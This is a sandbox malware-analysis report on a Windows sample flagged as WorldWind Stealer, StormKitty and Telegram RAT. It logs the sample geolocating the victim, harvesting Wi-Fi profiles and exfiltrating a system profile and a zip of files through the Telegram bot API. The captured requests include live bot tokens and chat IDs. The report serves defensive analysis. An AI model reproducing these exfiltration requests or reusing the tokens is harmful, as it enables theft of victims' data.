Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jun 23, 2023 21:21:37.131951094 CEST | 8.8.8.8 | 192.168.2.6 | 0x27c7 | Name error (3) | 202.200.1.0.in-addr.arpa | none | none | PTR (Pointer record) | IN (0x0001) | false
Jun 23, 2023 21:21:37.288489103 CEST | 8.8.8.8 | 192.168.2.6 | 0x5f30 | No error (0) | icanhazip.com | | 104.18.114.97 | A (IP address) | IN (0x0001) | false
Jun 23, 2023 21:21:37.288489103 CEST | 8.8.8.8 | 192.168.2.6 | 0x5f30 | No error (0) | icanhazip.com | | 104.18.115.97 | A (IP address) | IN (0x0001) | false
Jun 23, 2023 21:21:37.509968042 CEST | 8.8.8.8 | 192.168.2.6 | 0x3edb | No error (0) | api.mylnikov.org | | 172.67.196.114 | A (IP address) | IN (0x0001) | false
Jun 23, 2023 21:21:37.509968042 CEST | 8.8.8.8 | 192.168.2.6 | 0x3edb | No error (0) | api.mylnikov.org | | 104.21.44.66 | A (IP address) | IN (0x0001) | false
Jun 23, 2023 21:21:37.877794027 CEST | 8.8.8.8 | 192.168.2.6 | 0xd212 | No error (0) | api.telegram.org | | 149.154.167.220 | A (IP address) | IN (0x0001) | false
Jun 23, 2023 21:21:42.107374907 CEST | 8.8.8.8 | 192.168.2.6 | 0x6a79 | No error (0) | api.telegram.org | | 149.154.167.220 | A (IP address) | IN (0x0001) | false
                                                                                                                                                            • api.mylnikov.org
                                                                                                                                                            • api.telegram.org
                                                                                                                                                            • icanhazip.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.6 | 49715 | 172.67.196.114 | 443 | C:\Users\user\Desktop\file.exe
Timestamp | kBytes transferred | Direction | Data

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.6 | 49716 | 149.154.167.220 | 443 | C:\Users\user\Desktop\file.exe
Timestamp | kBytes transferred | Direction | Data

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.6 | 49717 | 149.154.167.220 | 443 | C:\Users\user\Desktop\file.exe
Timestamp | kBytes transferred | Direction | Data

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
3 | 192.168.2.6 | 49718 | 149.154.167.220 | 443 | C:\Users\user\Desktop\file.exe
Timestamp | kBytes transferred | Direction | Data

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
4 | 192.168.2.6 | 49719 | 149.154.167.220 | 443 | C:\Users\user\Desktop\file.exe
Timestamp | kBytes transferred | Direction | Data

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
5 | 192.168.2.6 | 49714 | 104.18.114.97 | 80 | C:\Users\user\Desktop\file.exe
Timestamp | kBytes transferred | Direction | Data
Jun 23, 2023 21:21:37.316687107 CEST | 0 | OUT | GET / HTTP/1.1
Host: icanhazip.com
Connection: Keep-Alive
Jun 23, 2023 21:21:37.339109898 CEST | 1 | IN | HTTP/1.1 200 OK
Date: Fri, 23 Jun 2023 19:21:37 GMT
Content-Type: text/plain
Content-Length: 11
Connection: keep-alive
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET
Set-Cookie: __cf_bm=fXcoSWtMkOYIH39T6zK8200e6fvh9EDfFnws0._Gtog-1687548097-0-AYWZbmWoVgmag1UTe8qwJTYV9BcjsLEkpaEjFs3s0pLIsxiJT+slk9VPHcXBLiAsJMLGUSZ2soOGi0coDJzLl5Q=; path=/; expires=Fri, 23-Jun-23 19:51:37 GMT; domain=.icanhazip.com; HttpOnly
Server: cloudflare
CF-RAY: 7dbf18583bb090dc-FRA
alt-svc: h3=":443"; ma=86400
Data Raw: 38 34 2e 31 37 2e 35 32 2e 35 0a
Data Ascii: 84.17.52.5


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.6 | 49715 | 172.67.196.114 | 443 | C:\Users\user\Desktop\file.exe
Timestamp | kBytes transferred | Direction | Data
2023-06-23 19:21:37 UTC | 0 | OUT | GET /geolocation/wifi?v=1.1&bssid=00:0c:29:82:cb:33 HTTP/1.1
Host: api.mylnikov.org
Connection: Keep-Alive
2023-06-23 19:21:37 UTC | 0 | IN | HTTP/1.1 200 OK
Date: Fri, 23 Jun 2023 19:21:37 GMT
Content-Type: application/json; charset=utf8
Content-Length: 88
Connection: close
Access-Control-Allow-Origin: *
Cache-Control: max-age=2678400
CF-Cache-Status: MISS
Last-Modified: Fri, 23 Jun 2023 19:21:37 GMT
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=cx1SeJpnqnLjcDQypTYJrYWF5%2F%2Fq2G2VXkfSlkRsuoL3D%2BrNH7UJvvsue4t9y9V7qSmjZkB8crk%2FSP93MmBO6UTgN8hO2cuSU%2B2Kl2hS2TV09kHHKz66KCY%2BVRaioeixR9xq"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Strict-Transport-Security: max-age=0; preload
X-Content-Type-Options: nosniff
Server: cloudflare
CF-RAY: 7dbf185b08632c77-FRA
alt-svc: h3=":443"; ma=86400
2023-06-23 19:21:37 UTC | 0 | IN | Data Ascii: {"result":404, "data":{}, "message":6, "desc":"Object was not found", "time":1687548097}


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.6 | 49716 | 149.154.167.220 | 443 | C:\Users\user\Desktop\file.exe
Timestamp | kBytes transferred | Direction | Data
2023-06-23 19:21:37 UTC | 0 | OUT | GET /bot6154715708:AAFzLcpt7CU7GhHYDqN7AZi1rev_GZv5Qe4/sendMessage?chat_id=1165040754&text=%0A%20%20%F0%9F%8C%AA%20*WorldWind%20Stealer%202.0.4%20-%20Results:*%0ADate:%202023-06-23%209:21:17%20PM%0ASystem:%20Windows%2010%20Pro%20(64%20Bit)%0AUsername:%20user%0ACompName:%20116938%0ALanguage:%20%F0%9F%87%BA%F0%9F%87%B8%20en-US%0AAntivirus:%20Windows%20Defender.%0A%0A%20%20%F0%9F%92%BB%20*Hardware:*%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%20F8HBZTST%0ARAM:%204095MB%0AHWID:%2067C81467FB%0APower:%20NoSystemBattery%20(1%25)%0AScreen:%201280x1024%0A%0A%20%20%F0%9F%93%A1%20*Network:*%20%0AGateway%20IP:%20192.168.2.1%0AInternal%20IP:%20No%20network%20adapters%20with%20an%20IPv4%20address%20in%20the%20system!%0AExternal%20IP:%2084.17.52.5%0ABSSID:%2000:0c:29:82:cb:33%0A%0A%20%20%F0%9F%92%B8%20*Domains%20info:*%0A%20%20%20%E2%88%9F%20%F0%9F%8F%A6%20*Bank%20Logs*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%92%B0%20*Crypto%20Logs*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%8D%93%20*Freaky%20Logs*%20(No%20data)%0A%0A%20%20%F0%9F%8C%90%20*Logs:*%0A%0A%20%20%F0%9F%97%83%20*Software:*%0A%0A%20%20%F0%9F%A7%AD%20*Device:*%0A%20%20%20%E2%88%9F%20%F0%9F%97%9D%20Windows%20product%20key%0A%20%20%20%E2%88%9F%20%F0%9F%8C%83%20Desktop%20screenshot%0A%0A%20%20%F0%9F%93%84%20*File%20Grabber:*%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Database%20files:%209%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Documents:%2060%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Images:%2040%0A%0A%20%20Contact%20Developer:%20@FlatLineStealer%0A%20%20%20Join%20The%20Telegram%20Channel:%20@CashOutGangTalk&parse_mode=Markdown&disable_web_page_preview=True HTTP/1.1
Host: api.telegram.org
Connection: Keep-Alive
2023-06-23 19:21:38 UTC | 2 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Fri, 23 Jun 2023 19:21:38 GMT
Content-Type: application/json
Content-Length: 2122
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2023-06-23 19:21:38 UTC | 3 | IN | Data Ascii: {"ok":true,"result":{"message_id":3917,"from":{"id":6154715708,"is_bot":true,"first_name":"oRG","username":"XChannX_bot"},"chat":{"id":1165040754,"first_name":"\u0196\u1ee9\u010d\u1ecb\u1e1f\u0454\u04f7","last_name":"\uff7f\u012f\u028d\u1e4d\u1e5d\u1e45\u


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.6 | 49717 | 149.154.167.220 | 443 | C:\Users\user\Desktop\file.exe
Timestamp | kBytes transferred | Direction | Data
2023-06-23 19:21:38 UTC | 5 | OUT | GET /bot6154715708:AAFzLcpt7CU7GhHYDqN7AZi1rev_GZv5Qe4/sendMessage?chat_id=1165040754&text=%F0%9F%93%81%20Uploading%20Log%20Folders... HTTP/1.1
Host: api.telegram.org
2023-06-23 19:21:38 UTC | 5 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Fri, 23 Jun 2023 19:21:38 GMT
Content-Type: application/json
Content-Length: 406
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2023-06-23 19:21:38 UTC | 5 | IN | Data Ascii: {"ok":true,"result":{"message_id":3918,"from":{"id":6154715708,"is_bot":true,"first_name":"oRG","username":"XChannX_bot"},"chat":{"id":1165040754,"first_name":"\u0196\u1ee9\u010d\u1ecb\u1e1f\u0454\u04f7","last_name":"\uff7f\u012f\u028d\u1e4d\u1e5d\u1e45\u


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
3 | 192.168.2.6 | 49718 | 149.154.167.220 | 443 | C:\Users\user\Desktop\file.exe
Timestamp | kBytes transferred | Direction | Data
2023-06-23 19:21:41 UTC | 6 | OUT | POST /bot6154715708:AAFzLcpt7CU7GhHYDqN7AZi1rev_GZv5Qe4/sendDocument?chat_id=1165040754 HTTP/1.1
Content-Type: multipart/form-data; boundary="1b2c3db3-4c43-4a40-ba16-8f0a6647d75a"
Host: api.telegram.org
Content-Length: 194790
Expect: 100-continue
2023-06-23 19:21:41 UTC | 6 | IN | HTTP/1.1 100 Continue
2023-06-23 19:21:41 UTC | 6 | OUT | Data Ascii: --1b2c3db3-4c43-4a40-ba16-8f0a6647d75a
2023-06-23 19:21:41 UTC | 6 | OUT | Data Ascii: Content-Disposition: form-data; name=document; filename="C:\Users\user\AppData\Local\1748642afea85b545bfef23bd04430d7\user@116938_en-US.zip"; filename*=utf-8''C%3A%5CUsers%5Cuser%5CAppData%5CLocal%5C1748642afea85b545bfef23bd04430d7%5Cuser%
                                                                                                                                                            Data Ascii: oB_;qKL%/RUiPlc(e58'zL]dP\Rh\A5^1G:o,sc .rL/c=w;XI]HSYQ"O|,\B4m>HtQP71kRl*;X..qZM|@%~J14mY.dd[@sjc*4us}hwf\
                                                                                                                                                            2023-06-23 19:21:41 UTC166OUTData Raw: c7 f4 86 f6 ae a5 3b f4 8a 81 a5 34 27 f4 ff 23 5f 01 e2 fb b6 f0 b7 85 60 80 94 c1 91 b4 d6 d6 31 83 e5 f9 55 7f 8f fb c7 d5 dd b0 80 d1 8c ee 1f da 45 2d 1b 3d eb 5b 9f 90 dc a5 d9 a9 84 53 02 84 2a 01 f8 99 56 f1 42 3e 1b 05 22 b0 5d a8 2a 09 9e d3 26 05 36 4a 82 c7 b9 89 c6 b2 c1 93 83 fd c4 81 1a 6a d3 61 fb 72 41 78 9d 8d 57 fd 78 ca 0c 74 51 02 36 81 e0 24 c0 c7 b4 89 e2 84 d9 9f 5e e0 38 4c e0 46 3e 61 b9 e6 37 2c 16 1f 72 81 84 f9 21 40 76 23 10 cf 9b 73 32 dd 32 c9 f0 da 4a dd fc 3f c7 c6 5b 6e dc e0 c9 7e 4a a1 07 ba ba e4 30 b4 22 06 98 8c c9 24 01 d6 e6 0e 06 6a cd 33 53 d2 e7 e2 e5 ed 16 2d 6d 22 46 0c dc d0 cf 4b b0 ce 1b a8 27 cc 14 ed 64 63 44 dc e8 c1 af 49 42 44 94 95 94 a5 57 5d b4 e6 cc e5 70 56 29 ea dc 1c 30 ee 5e 4e 49 3c 01 17 51
                                                                                                                                                            Data Ascii: ;4'#_`1UE-=[S*VB>"]*&6JjarAxWxtQ6$^8LF>a7,r!@v#s22J?[n~J0"$j3S-m"FK'dcDIBDW]pV)0^NI<Q
                                                                                                                                                            2023-06-23 19:21:41 UTC182OUTData Raw: 91 38 28 e4 cc 19 fb 75 a4 ed d1 c1 33 c4 73 4f e2 a5 c1 bc 36 ab 2b 65 91 46 55 1e c9 b8 4f c3 be f9 82 20 8b 41 8a 20 39 18 68 4f 68 40 3d 2c 60 e3 98 e8 61 eb be 23 ad 73 47 39 7c 3e 9e 67 e5 c7 db e7 cf b1 5a 24 b2 a7 fb 6e e7 a2 46 d2 df 1f 8c e1 93 49 b5 6f 34 78 74 58 44 ab dd 50 d2 89 d1 cf 4a bd 5e 34 b3 2e 7e a2 90 af c7 8d d0 8f 54 5d 65 68 7c 4f 57 de 4c 93 7e 9d 2c 02 27 5a 8a a0 c4 2f 73 cc d6 ed ed e0 86 f0 16 a5 de 91 51 54 00 f7 15 d2 76 85 2b a4 c4 0a 39 0f b5 f0 d4 bb df ee 56 56 78 8f 98 7d f4 08 85 b3 2a b9 f2 d0 c4 3a 5d f9 f8 c8 23 e9 7c df 33 05 59 2b fa 89 8a 52 dd 72 6b 76 22 a6 83 eb 4d 06 d5 70 28 d9 e1 8b ec df a9 d7 f3 0f 15 77 d3 9f b2 a7 ff 60 7b cf 16 c2 2b 1d d3 ba fd c7 d0 de 51 b0 d0 49 11 ef aa b4 db e7 2a c9 8c ea b4
                                                                                                                                                            Data Ascii: 8(u3sO6+eFUO A 9hOh@=,`a#sG9|>gZ$nFIo4xtXDPJ^4.~T]eh|OWL~,'Z/sQTv+9VVx}*:]#|3Y+Rrkv"Mp(w`{+QI*
                                                                                                                                                            2023-06-23 19:21:41 UTC196OUTData Raw: 0d 0a 2d 2d 31 62 32 63 33 64 62 33 2d 34 63 34 33 2d 34 61 34 30 2d 62 61 31 36 2d 38 66 30 61 36 36 34 37 64 37 35 61 2d 2d 0d 0a
                                                                                                                                                            Data Ascii: --1b2c3db3-4c43-4a40-ba16-8f0a6647d75a--
                                                                                                                                                            2023-06-23 19:21:42 UTC | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                            Server: nginx/1.18.0
                                                                                                                                                            Date: Fri, 23 Jun 2023 19:21:42 GMT
                                                                                                                                                            Content-Type: application/json
                                                                                                                                                            Content-Length: 623
                                                                                                                                                            Connection: close
                                                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                                            {"ok":true,"result":{"message_id":3919,"from":{"id":6154715708,"is_bot":true,"first_name":"oRG","username":"XChannX_bot"},"chat":{"id":1165040754,"first_name":"\u0196\u1ee9\u010d\u1ecb\u1e1f\u0454\u04f7","last_name":"\uff7f\u012f\u028d\u1e4d\u1e5d\u1e45\u0268\u1e45\u0262\u0455\u1e6f\u1ea3\u1e5d","username":"Lucifer7005","type":"private"},"date":1687548101,"document":{"file_name":"C_UsersuserAppDataLocal1748642afea85b545bfef23bd04430d7engin.zip","mime_type":"application/zip","file_id":"BQACAgEAAxkDAAIPT2SV8MW7lID9JvBX_3BPgD9yguG2AAJXBAACLkCwRJzx3yEiUSm6LwQ","file_unique_id":"AgADVwQAAi5AsEQ","file_size":194429}}}


                                                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                                            4 | 192.168.2.6 | 49719 | 149.154.167.220 | 443 | C:\Users\user\Desktop\file.exe
                                                                                                                                                            Timestamp | kBytes transferred | Direction | Data
                                                                                                                                                            2023-06-23 19:21:42 UTC | 197 | OUT | POST /bot1119746739:AAGMhvpUjXI4CzIfizRC--VXilxnkJlhaf8/sendDocument?chat_id=1096425866 HTTP/1.1
                                                                                                                                                            Content-Type: multipart/form-data; boundary="e77a6233-58d8-4287-8763-8e3899d68419"
                                                                                                                                                            Host: api.telegram.org
                                                                                                                                                            Content-Length: 194790
                                                                                                                                                            Expect: 100-continue
                                                                                                                                                            2023-06-23 19:21:42 UTC | 197 | IN | HTTP/1.1 100 Continue
                                                                                                                                                            2023-06-23 19:21:42 UTC | 197 | OUT | Data Ascii: --e77a6233-58d8-4287-8763-8e3899d68419
                                                                                                                                                            2023-06-23 19:21:42 UTC | 197 | OUT | Data Ascii: Content-Disposition: form-data; name=document; filename="C:\Users\user\AppData\Local\1748642afea85b545bfef23bd04430d7\user@116938_en-US.zip"; filename*=utf-8''C%3A%5CUsers%5Cuser%5CAppData%5CLocal%5C1748642afea85b545bfef23bd04430d7%5Cuser%
                                                                                                                                                            2023-06-23 19:21:42 UTC | 388 | IN | HTTP/1.1 400 Bad Request
                                                                                                                                                            Server: nginx/1.18.0
                                                                                                                                                            Date: Fri, 23 Jun 2023 19:21:42 GMT
                                                                                                                                                            Content-Type: application/json
                                                                                                                                                            Content-Length: 56
                                                                                                                                                            Connection: close
                                                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                                            {"ok":false,"error_code":400,"description":"Logged out"}



                                                                                                                                                            Target ID:0
                                                                                                                                                            Start time:21:21:12
                                                                                                                                                            Start date:23/06/2023
                                                                                                                                                            Path:C:\Users\user\Desktop\file.exe
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:C:\Users\user\Desktop\file.exe
                                                                                                                                                            Imagebase:0xee0000
                                                                                                                                                            File size:174080 bytes
                                                                                                                                                            MD5 hash:C03A7CEDC3314E6F0DC26431503DD035
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:.Net C# or VB.NET
                                                                                                                                                            Yara matches:
                                                                                                                                                            • Rule: JoeSecurity_WorldWindStealer, Description: Yara detected WorldWind Stealer, Source: 00000000.00000002.741988818.0000000003328000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: JoeSecurity_WorldWindStealer, Description: Yara detected WorldWind Stealer, Source: 00000000.00000000.472435711.0000000000EE2000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000000.472435711.0000000000EE2000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000000.00000000.472435711.0000000000EE2000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: JoeSecurity_StormKitty, Description: Yara detected StormKitty Stealer, Source: 00000000.00000000.472435711.0000000000EE2000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000000.472435711.0000000000EE2000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 00000000.00000000.472435711.0000000000EE2000.00000002.00000001.01000000.00000003.sdmp, Author: ditekSHen
                                                                                                                                                            • Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: 00000000.00000000.472435711.0000000000EE2000.00000002.00000001.01000000.00000003.sdmp, Author: ditekSHen
                                                                                                                                                            • Rule: JoeSecurity_WorldWindStealer, Description: Yara detected WorldWind Stealer, Source: 00000000.00000002.741988818.00000000032B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.741988818.00000000032B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: JoeSecurity_StormKitty, Description: Yara detected StormKitty Stealer, Source: 00000000.00000002.741988818.00000000032B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.741988818.00000000032B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: 00000000.00000002.741988818.00000000032B1000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                            Reputation:low

                                                                                                                                                            Target ID:1
                                                                                                                                                            Start time:21:21:34
                                                                                                                                                            Start date:23/06/2023
                                                                                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
                                                                                                                                                            Imagebase:0x1b0000
                                                                                                                                                            File size:232960 bytes
                                                                                                                                                            MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Reputation:high

                                                                                                                                                            Target ID:2
                                                                                                                                                            Start time:21:21:34
                                                                                                                                                            Start date:23/06/2023
                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                            Imagebase:0x7ff6da640000
                                                                                                                                                            File size:625664 bytes
                                                                                                                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Reputation:high

                                                                                                                                                            Target ID:3
                                                                                                                                                            Start time:21:21:34
                                                                                                                                                            Start date:23/06/2023
                                                                                                                                                            Path:C:\Windows\SysWOW64\chcp.com
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:chcp 65001
                                                                                                                                                            Imagebase:0x1360000
                                                                                                                                                            File size:12800 bytes
                                                                                                                                                            MD5 hash:561054CF9C4B2897E80D7E7D9027FED9
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Reputation:high

                                                                                                                                                            Target ID:4
                                                                                                                                                            Start time:21:21:34
                                                                                                                                                            Start date:23/06/2023
                                                                                                                                                            Path:C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:netsh wlan show profile
                                                                                                                                                            Imagebase:0x970000
                                                                                                                                                            File size:82944 bytes
                                                                                                                                                            MD5 hash:A0AA3322BB46BBFC36AB9DC1DBBBB807
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Reputation:high

                                                                                                                                                            Target ID:5
                                                                                                                                                            Start time:21:21:34
                                                                                                                                                            Start date:23/06/2023
                                                                                                                                                            Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:findstr All
                                                                                                                                                            Imagebase:0xc20000
                                                                                                                                                            File size:29696 bytes
                                                                                                                                                            MD5 hash:8B534A7FC0630DE41BB1F98C882C19EC
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Reputation:high

                                                                                                                                                            Target ID:6
                                                                                                                                                            Start time:21:21:34
                                                                                                                                                            Start date:23/06/2023
                                                                                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:"cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
                                                                                                                                                            Imagebase:0x1b0000
                                                                                                                                                            File size:232960 bytes
                                                                                                                                                            MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                                                            Target ID:7
                                                                                                                                                            Start time:21:21:35
                                                                                                                                                            Start date:23/06/2023
                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                            Imagebase:0x7ff6da640000
                                                                                                                                                            File size:625664 bytes
                                                                                                                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                                                            Target ID:8
                                                                                                                                                            Start time:21:21:35
                                                                                                                                                            Start date:23/06/2023
                                                                                                                                                            Path:C:\Windows\SysWOW64\chcp.com
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:chcp 65001
                                                                                                                                                            Imagebase:0x1360000
                                                                                                                                                            File size:12800 bytes
                                                                                                                                                            MD5 hash:561054CF9C4B2897E80D7E7D9027FED9
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                                                            Target ID:9
                                                                                                                                                            Start time:21:21:35
                                                                                                                                                            Start date:23/06/2023
                                                                                                                                                            Path:C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:netsh wlan show networks mode=bssid
                                                                                                                                                            Imagebase:0x970000
                                                                                                                                                            File size:82944 bytes
                                                                                                                                                            MD5 hash:A0AA3322BB46BBFC36AB9DC1DBBBB807
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language


                                                                                                                                                              Execution Graph

                                                                                                                                                              Execution Coverage:17.5%
                                                                                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                              Signature Coverage:0%
                                                                                                                                                              Total number of Nodes:137
                                                                                                                                                              Total number of Limit Nodes:2

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.741839038.0000000003250000.00000040.00000800.00020000.00000000.sdmp, Offset: 03250000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_3250000_file.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: <q
                                                                                                                                                              • API String ID: 0-3838347278
                                                                                                                                                              • Opcode ID: 13a382bbe7f4d484a0415389c0a3b6031e14d4bd23bb7e1814e8e33d12438883
                                                                                                                                                              • Instruction ID: 6ef4949e7a9edb33ca46a00df9a884e6081d3c6f1c4dc7a8b7a10465009b3027
                                                                                                                                                              • Opcode Fuzzy Hash: 13a382bbe7f4d484a0415389c0a3b6031e14d4bd23bb7e1814e8e33d12438883
                                                                                                                                                              • Instruction Fuzzy Hash: 98D16D74E10219CFCB14DFA8C484AAEFBF6FF48314F14815AE815AB355DB74A986CB90
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.741923834.0000000003290000.00000040.00000800.00020000.00000000.sdmp, Offset: 03290000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_3290000_file.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                              • Opcode ID: 21dd2ecab99aed19258a9539acc0404cf7c4eb5df37727567b241c6062f31e5d
                                                                                                                                                              • Instruction ID: 085694b7e45d873cb9a17da65681044e2e145f5cc4cf86363e6b1f2fe507050b
                                                                                                                                                              • Opcode Fuzzy Hash: 21dd2ecab99aed19258a9539acc0404cf7c4eb5df37727567b241c6062f31e5d
                                                                                                                                                              • Instruction Fuzzy Hash: 2F214A30B10215CFDB18DB78D5586AE76F7EB88740F204179C506EB3A4DE7A9D82CB94
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.741839038.0000000003250000.00000040.00000800.00020000.00000000.sdmp, Offset: 03250000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_3250000_file.jbxd
                                                                                                                                                              Similarity
